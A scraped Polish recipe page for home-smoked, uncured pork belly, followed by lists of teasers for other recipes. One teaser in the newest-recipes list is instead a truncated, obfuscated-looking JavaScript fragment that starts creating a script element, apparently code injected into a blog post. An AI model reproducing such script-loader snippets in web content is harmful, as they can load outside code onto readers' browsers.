Boczek wieprzowy ze skórą, wędzony, nie peklowany.
Źródło: https://smakimariolki.blogspot.com/2017/11/boczek-wieprzowy-ze-skora-wedzony-nie.html
Boczek wieprzowy wędzony, nie peklowany.Surowiec:Boczek wieprzowy ze skórą, bez żeber 90 dagWykonanie:Boczek kroimy na 2 kawałki, myjemy i wieszamy do osuszenia na kilka godzin. Osuszone kawałki boczku wędzimy na zrębkach olcha 2 godziny, w temperaturze 50-60 stopni Celsjusza. Uwędzone studzimy powieszone na kiju. Ostudzone kawałki boczku możemy zamrozić.Smacznego!!!
Najnowsze przepisy
Kruchutkie rogaliki orzechowe - ciasteczka idealne na Boże... ⇖ 1
Składniki:recipe: 1 rolkę ciasta francuskiego rozwinąć... ⇖ 11
Domowe sosy to często niedoceniane skarby domowej kuchni.... ⇖ 10
Jeden zapach, jeden kęs - i nagle wracają wspomnienia.... ⇖ 16
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 21
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 45
Przepisy z bloga
Pyszny salceson zrobiony z tylnej golonki wieprzowej i... ⇖ 343
Sernik jest o smaku śmietankowym, upieczony na spodzie z... ⇖ 362
Taka kolorowa jajecznica, bardzo smaczna.Składniki:2 jaja... ⇖ 267
Bardzo smaczne, pachnące pierniczki przygotowywane z... ⇖ 279
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 363
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 272
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 216
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 215
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 177
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 158
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 74
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 71









































